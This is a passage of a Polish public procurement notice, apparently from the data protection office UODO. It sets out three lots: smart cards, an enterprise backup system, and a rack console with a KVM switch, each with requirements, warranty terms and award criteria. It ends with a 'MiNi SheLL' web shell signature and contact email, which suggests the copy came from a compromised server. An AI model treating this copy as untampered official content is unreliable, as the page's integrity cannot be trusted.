dokumentacji:•	Projekt Techniczny rozwiązania, zawierający co najmniej:o	Architekturę wysoko i niskopoziomową rozwiązaniao	Opis techniczny rozwiązania wraz z jego elementamio	Dokumentacja techniczna preinstalowanych pakietów i apletów.o	Szczegółowy opis obsługi rozwiązania informatycznego•	Opis procesu instalacji oraz konfiguracji•	Procedurę pozwalającą na samodzielne odtworzenie systemu przez Zamawiającego•	Specyfikację techniczna karty•	Dokumentacja techniczna oprogramowania dostarczanego z kartą•	Instrukcja obsługi drukarki do kart7.	Gwarancja i wsparcie powdrożenioweWykonawca obejmie przedmiot zamówienia gwarancją na okres 3 miesięcy od wdrożenia. W ramach gwarancji wykonawca zapewni:•	wsparcie telefoniczne lub mailowe dla Administratorów, centralnych wdrożonych Systemów i usług;•	osobiste wsparcie dedykowanych specjalistów w siedzibie Zamawiającego w liczbie co najmniej 40 godzin;•	transfer wiedzy dla Administratorów na temat każdego wdrożonego Systemu w ilości minimum 24 godzin;Czas reakcji serwisu na podjęcie naprawy gwarancyjnej w terminie 1 dnia roboczego od daty zgłoszenia. Do oferty należy dołączyć opis techniczny wraz z planowaną architekturą oprogramowania, zaoferowanych kart procesorowych, sprzętu, przeinstalowanych pakietów i apletów (wraz z nazwą producenta i typem modelu) w celu potwierdzenia, że oferowana dostawa odpowiada wymaganiom określonym przez Zamawiającego – w języku polskim.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>48730000-4, 30230000-0, 30200000-1<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: 21<br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">termin wdrożenia</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Zakup i wdrożenie systemu kopii zapasowych</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem postępowania jest dostawa centralnego systemu wykonywania kopii zapasowych oraz replik kopii w wersji Enterprise Plus – (licencja na 50 urządzeń) zdefiniowanego środowiska informatycznego UODO.II.	Wdrożenie prowadzone powinno być etapami poprzez:-	rozpoznanie techniczne bieżącej infrastruktury,-	sporządzenie projektu wdrożenia oraz-	dostawę oprogramowania i/lub stosownych urządzeń umożliwiających kompleksowe wykonywanie kopii zapasowych dla zdefiniowanego środowiska Informatycznego UODO oraz odtwarzanie z nich systemów i danych w przypadku awarii.III.	Realizacja zamówienia powinna w szczególności obejmować:1.	Rozpoznanie techniczne bieżącej infrastruktury w UODO,2.	Opracowanie projektu wdrożenia z uwzględnieniem informacji z przeprowadzonego rozpoznania technicznego o użytkowanych w UODO systemach i konfiguracji sieci komputerowej,3.	Dostawa oprogramowania i/lub sprzętu opisanego w niniejszej specyfikacji,4.	Wdrożenie opracowanego projektu w środowisku infrastruktury UODO,5.	Wdrożenie procedur wykonywania kopii dla poszczególnych źródeł danych (systemów, usług i baz danych),6.	Opracowanie harmonogramu wykonywania kopii, weryfikacji poprawności ich wykonania, czasu retencji oraz harmonogramu i procedur usuwania,7.	Opracowanie testowych i produkcyjnych procedur odzyskiwania danych (odtwarzania systemu w przypadku awarii),8.	Przeprowadzenie testów wydajności i poprawności działania wdrożonych rozwiązań.9.	Opracowanie dokumentacji powykonawczej zawierającej logiczną i/lub fizyczną architekturę rozwiązania pozwalającej w przyszłości na samodzielne wykonanie instalacji i konfiguracji systemu przez zamawiającego. Dokumentacja powinna być wykonana w języku polskim.10.	Nieodpłatne wsparcie techniczne i programowe, w tym niezbędne aktualizacje, przez okres 12 miesięcy od daty podpisania końcowego protokołu zdawczo-odbiorczego.11.	Szkolenie minimum 2 osób z obsługi, konfiguracji i innych niezbędnych czynności potrzebnych do prawidłowego i ciągłego działania systemu.a)	Wsparcie (części) techniczne producenta w trybie 24/7/365, z możliwością zgłaszania problemów telefonicznie oraz za pomocą poczty e-mail.IV.	Wszelkie prace związane z konfiguracją i integracją sieci należy traktować jako tajemnicę przedsiębiorstwa (Zamawiającego) zgodnie z ustawą z dnia 16.04.1993 r. o zwalczaniu nieuczciwej konkurencji (t.j. Dz. U. z 2020 r., poz. 1913).<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>48730000-4, 30200000-1, 30230000-0<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: 21<br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena </td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">termin wdrożena</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>3</td><td><b>Nazwa: </b></td><td>Zakup i dostawa konsoli (klawiatura, monitor, mysz) i przełącznika KVM</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest zakup i dostawa konsoli (klawiatura, monitor, mysz) i przełącznika KVM – 1 szt.I. Wymagania dotyczące gwarancji: 1) Wykonawca zobowiązany jest udzielić gwarancji jakości na prawidłowe działanie dostarczonego sprzętu (wszystkich jego elementów) na okres minimum 36 miesięcy (nie krótszy jednak niż okres gwarancji producenta). 2) Naprawy gwarancyjne wykonywane będą w dni robocze tj. od poniedziałku do piątku, w godzinach od 8.00 do 16.00. 3) Czas reakcji na zgłoszone usterki 8 godzin. Zdalnie za pośrednictwem:- poczty elektronicznej e-mail: (adres email Wykonawcy)- oraz telefonicznie : na numer telefonu: (numer telefonu)4) Naprawy realizowane będą każdorazowo w miejscu dostarczenia przedmiotu zamówienia.5) Maksymalny czas naprawy/wymiany 7 dni roboczych od reakcji na zgłoszoną usterkę.II. Opis zamówienia:1) Konsola (klawiatura, monitor, mysz) składająca się z monitora, klawiatury i touchpada. Konsola musi być przeznaczona do montażu w szafie serwerowej standardu RACK i po złożeniu jej wysokość instalacyjna nie może przekraczać wysokości 1U. 2) Przełącznik KVM Przełącznik musi być przeznaczony do montażu w szafie serwerowej standardu RACK i nie może przekraczać wysokości 1U. III. Wymagania:1) Urządzenia muszą pochodzić z oficjalnych kanałów dystrybucji producenta obejmujących rynek polski, zapewniając w szczególności realizację uprawnień gwarancyjnych. 2) Urządzenia muszą być fabrycznie przystosowane do instalacji w szafach RACK w orientacji poziomej. 3) Wysokość instalacyjna urządzeń nie może przekraczać wysokości 1U.4) Urządzenia muszą być przystosowane do pracy ciągłej 365 dni w roku. IV. Ogólne właściwości użytkowe: a) Konsola (klawiatura, monitor, mysz): 1) Urządzenie musi posiadać wbudowany ekran LCD o przekątnej minimum 18,5”. 2) Urządzenie musi posiadać wbudowaną klawiaturę z układem International English (qwerty). 3) Urządzenie musi posiadać wbudowaną mysz minimum trzyprzyciskową w formie touchpad. 4. Urządzenie musi posiadać porty przyłączeniowe do połączenia z przełącznikiem KVM. 5) Konsola powinna być wyposażona w szyny montażowe pozwalające na instalację w szafie rack. Szyny powinny umożliwiać korzystanie z konsoli (klawiatura monitor mysz) przy zajętości sąsiednich miejsc instalacyjnych w szafie – pełne wysunięcie oraz otwarcie urządzenia. 6) Należy zapewnić niezbędne kable przyłączeniowe do przełącznika KVM oraz okablowanie zasilające do przyłączenia zasilania. b) Przełącznik KVM: 1)	Urządzenie musi posiadać 16 portów. 2)	Dostęp do urządzenia jest realizowany za pośrednictwem TCP/IP. Łącza te obsługują szyfrowanie DES, 3DES, AES i 128-bitowy protokół SSL w ramach sesji KVM i nośników wirtualnych.3)	Urządzenie musi posiadać porty (VGA, USB) do podłączenia konsoli KVM LCD. 4)	Urządzenie musi posiadać redundantne zasilacze. 5)	Urządzenie musi umożliwiać mapowanie bezpośrednio podłączonych urządzeń do przełącznika KVM (USB DVD-ROM, USB Pendrive) do podłączonych serwerów. 6)	Urządzenie musi umożliwiać zestawianie zdalnych połączeń do konsol serwerów (minimum 2 użytkowników pracujących równocześnie). 7)	Urządzenie musi być wyposażone w kable 6 metrów długości. (16 szt.) do podłączenia serwerów poprzez porty cyfrowe/IP.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>30231200-9, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: 21<br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">termin dostawy</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com